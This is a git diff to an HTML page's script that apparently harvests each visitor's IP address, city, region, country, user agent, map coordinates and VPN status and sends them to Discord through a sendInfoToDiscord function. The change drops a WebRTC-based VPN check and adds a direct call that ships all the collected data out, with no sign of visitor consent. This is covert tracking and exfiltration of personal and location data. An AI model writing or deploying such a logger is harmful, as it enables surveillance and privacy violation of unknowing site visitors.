--- a/index.html
+++ b/index.html
@@ -50,30 +50,6 @@
                 return `https://www.google.com/maps?q=${coordinates}`;
             };
 
-            // Function to check if the user is using a VPN
-            const checkVPN = () => {
-                const RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
-
-                if (RTCPeerConnection) {
-                    const rtc = new RTCPeerConnection({ iceServers: [] });
-                    rtc.createDataChannel('');
-
-                    rtc.createOffer().then(
-                        rtc.createAnswer.bind(rtc),
-                        () => {
-                            // The user is likely using a VPN
-                            sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, true, 'N/A');
-                        }
-                    ).catch(() => {
-                        // The user is not using a VPN
-                        sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, false, 'N/A');
-                    });
-                } else {
-                    // Unable to determine VPN status
-                    sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, 'Unknown', 'N/A');
-                }
-            };
-
             // Function to get visitor's information including coordinates
             const getVisitorInfo = async () => {
                 try {
@@ -90,9 +66,10 @@
                     const ip = infoData.ip || 'N/A';
                     const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
                     const userAgent = navigator.userAgent;
+                    const isVPN = infoData.vpn || false;
 
-                    // Check if the user is using a VPN
-                    checkVPN();
+                    // Sending data to Discord with VPN status
+                    sendInfoToDiscord(ip, address, userAgent, isVPN, coordinates);
                 } catch (error) {
                     console.error('Error fetching location or address:', error);
                 }
